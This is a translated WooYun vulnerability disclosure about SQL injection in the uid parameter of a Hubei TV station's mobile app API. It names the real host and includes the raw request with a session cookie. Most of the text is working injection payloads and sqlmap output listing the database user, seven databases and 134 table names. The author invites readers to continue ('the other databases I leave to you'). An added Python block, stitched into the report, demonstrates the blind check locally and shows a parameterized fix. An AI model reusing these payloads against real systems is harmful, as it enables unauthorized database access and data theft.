WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-01-09: Details reported to the vendor, awaiting vendor handling
2015-01-14: Vendor confirmed; details disclosed to the vendor only
2015-01-24: Details disclosed to core white hats and relevant domain experts
2015-02-03: Details disclosed to regular white hats
2015-02-13: Details disclosed to intern white hats
2015-02-23: Details disclosed to the public
I watch TV every evening, and whatever is on TV has to show up on WooYun.
Screenshots first.
The official Hubei Jingshi (湖北经视) app, the 经视摇摇乐 mobile app, has a SQL injection.
GET /mobile/memberMsg/getMsg?uid=108514 HTTP/1.1
Host: mylive.moyuntv.com
Proxy-Connection: keep-alive
Referer: http://mylive.moyuntv.com/html/wap/userMsg.html
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; I318_T3 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: SERVERID=22115a7fc2c2cdf4460032a2809aff4a|1420720839|1420720839

The uid parameter of this request is injectable. sqlmap output:

Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=108514 AND 8100=8100

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=108514 AND (SELECT 2922 FROM(SELECT COUNT(*),CONCAT(0x3a646a67a,(SELECT (CASE WHEN (2922=2922) THEN 1 ELSE 0 END)),0x3a726a723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: uid=108514; SELECT SLEEP(5);--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=108514 AND SLEEP(5)
---
[20:54:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0
[20:54:14] [INFO] fetching current user
[20:54:14] [INFO] retrieved: operlive@%
current user: 'operlive@%'
[20:54:14] [INFO] fetching database names
[20:54:15] [INFO] the SQL query used returns 7 entries
[20:54:15] [INFO] retrieved: information_schema
[20:54:15] [INFO] retrieved: hm_live
[20:54:15] [INFO] retrieved: hm_live_perinstall
[20:54:15] [INFO] retrieved: my_ad
[20:54:15] [INFO] retrieved: my_score
[20:54:15] [INFO] retrieved: mysql
[20:54:15] [INFO] retrieved: performance_schema
available databases [7]:
[*] hm_live
[*] hm_live_perinstall
[*] information_schema
[*] my_ad
[*] my_score
[*] mysql
[*] performance_schema

The hm_live_perinstall database alone has 134 tables; the other databases I leave to you.

you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y
[22:02:52] [INFO] the SQL query used returns 134 entries
Database: hm_live_perinstall
[134 tables]
+---------------------------+
| hm_aca                    |
| hm_activity               |
| hm_activity_apply         |
| hm_annunciate             |
| hm_app_recommend          |
| hm_app_recommend_stat     |
| hm_baoliao                |
| hm_c_activity             |
| hm_c_article              |
| hm_c_ecommerce            |
| hm_c_guess                |
| hm_c_link                 |
| hm_c_localshop            |
| hm_c_pic                  |
| hm_c_prize                |
| hm_c_q_answer             |
| hm_c_special              |
| hm_c_video                |
| hm_c_vote                 |
| hm_card_type              |
| hm_cash_action            |
| hm_cash_log               |
| hm_cash_withdraw          |
| hm_catalog                |
| hm_catalog_purview        |
| hm_channel                |
| hm_channel_control        |
| hm_channel_prize          |
| hm_channel_program        |
| hm_channel_purview        |
| hm_channel_schedule       |
| hm_channel_type           |
| hm_com_app                |
| hm_com_app_version        |
| hm_com_apply              |
| hm_com_config             |
| hm_com_feedback           |
| hm_com_game               |
| hm_com_user               |
| hm_comment                |
| hm_company                |
| hm_config                 |
| hm_config_copy            |
| hm_content                |
| hm_content_log            |
| hm_content_model          |
| hm_content_stat           |
| hm_content_status         |
| hm_coupons                |
| hm_dnamedia               |
| hm_ecommerce              |
| hm_egoods                 |
| hm_form_option            |
| hm_form_type              |
| hm_game                   |
| hm_game_copy              |
| hm_group                  |
| hm_guess_log              |
| hm_guess_object           |
| hm_guess_option           |
| hm_info_content           |
| hm_info_type              |
| hm_interact               |
| hm_local_goods            |
| hm_login_log              |
| hm_lottery                |
| hm_lottery_code           |
| hm_lottery_log            |
| hm_lottery_type           |
| hm_manual_control_log     |
| hm_member                 |
| hm_member_data            |
| hm_member_detail          |
| hm_member_findpwd         |
| hm_member_group           |
| hm_member_login_log       |
| hm_member_msg             |
| hm_member_score           |
| hm_member_thirdaccount    |
| hm_member_vest            |
| hm_menu                   |
| hm_menu_copy              |
| hm_merchant_home          |
| hm_message                |
| hm_news_recommend         |
| hm_oplog                  |
| hm_order                  |
| hm_pay_callback_log       |
| hm_pic                    |
| hm_plug_part              |
| hm_prize                  |
| hm_prize_catalog          |
| hm_prize_exchange         |
| hm_prize_show_log         |
| hm_prize_type             |
| hm_prized_log             |
| hm_qa_log                 |
| hm_qa_option              |
| hm_rank_user_num          |
| hm_recommend_home         |
| hm_recommend_type         |
| hm_report                 |
| hm_role                   |
| hm_role_aca               |
| hm_score_activity         |
| hm_score_log              |
| hm_score_rule             |
| hm_sensitive_word         |
| hm_sensitive_word_type    |
| hm_share_score_log        |
| hm_shop_seckill           |
| hm_shop_voucher_log       |
| hm_signin                 |
| hm_site_share             |
| hm_sms                    |
| hm_spchoujiang            |
| hm_spcomment              |
| hm_task                   |
| hm_task_condition         |
| hm_task_log               |
| hm_task_prize_rand_log    |
| hm_task_restrictions_type |
| hm_task_type              |
| hm_temp_lotterywin        |
| hm_terminal_info          |
| hm_topic__bak             |
| hm_unique_score           |
| hm_user_oplog             |
| hm_validate               |
| hm_video                  |
| hm_vms_catalog_purview    |
| hm_vote_detail            |
| hm_vote_option            |
| hm_vote_stat              |
+---------------------------+

I did not go any further.
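The boolean-based blind check sqlmap reports above (a TRUE condition must leave the response unchanged, a FALSE condition must change it) can be reproduced against a local stand-in. The following is an added Python example, not code from the original report or from the vendor: it builds an in-memory SQLite table that plays the role of the member-message lookup, shows the injectable string-concatenated query beside a hardened variant (digit check plus parameter binding), and runs the same TRUE/FALSE probe against both. The table layout, sample rows and function names are constructed for illustration; the MySQL-only payloads (SLEEP, stacked queries) are not reproduced because SQLite has no SLEEP and its execute() refuses stacked statements.

```python
import sqlite3

# Constructed stand-in for the hm_member_msg lookup; rows are invented.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE hm_member_msg (id INTEGER PRIMARY KEY, uid INTEGER, msg TEXT);
INSERT INTO hm_member_msg (uid, msg) VALUES (108514, 'hello'), (108515, 'other');
""")


def get_msg_vulnerable(uid: str):
    """Mimics the injectable endpoint: uid is pasted straight into the WHERE
    clause, so 'uid=108514 AND 8100=8100' becomes part of the SQL."""
    sql = f"SELECT id, msg FROM hm_member_msg WHERE uid = {uid}"
    return conn.execute(sql).fetchall()


def get_msg_safe(uid: str):
    """Hardened version (hypothetical fix): reject anything that is not a
    plain integer, then bind the value as a parameter so it can never be
    parsed as SQL."""
    if not uid.isdigit():
        return []
    return conn.execute(
        "SELECT id, msg FROM hm_member_msg WHERE uid = ?", (int(uid),)
    ).fetchall()


def boolean_blind_check(fetch, base="108514"):
    """sqlmap-style boolean-based blind test.

    Sends the baseline value, a TRUE tautology and a FALSE contradiction.
    The parameter is injectable if the TRUE probe returns exactly the
    baseline response while the FALSE probe returns something different.
    Database errors are treated as a response of their own."""
    def probe(value):
        try:
            return ("ok", fetch(value))
        except sqlite3.Error as exc:
            return ("err", str(exc))

    baseline = probe(base)
    true_resp = probe(f"{base} AND 8100=8100")
    false_resp = probe(f"{base} AND 8100=8101")
    return true_resp == baseline and false_resp != baseline


if __name__ == "__main__":
    print("vulnerable endpoint injectable:", boolean_blind_check(get_msg_vulnerable))
    print("hardened endpoint injectable:  ", boolean_blind_check(get_msg_safe))
```

The hardened variant fails the probe because the TRUE payload is rejected before it reaches the database, so its response no longer matches the baseline. A numeric parameter is the classic case where quoting alone is not enough: the original query had no quotes to break out of, which is why the payloads above need no closing quote.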
You know the rest.
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-01-14 11:15
None yet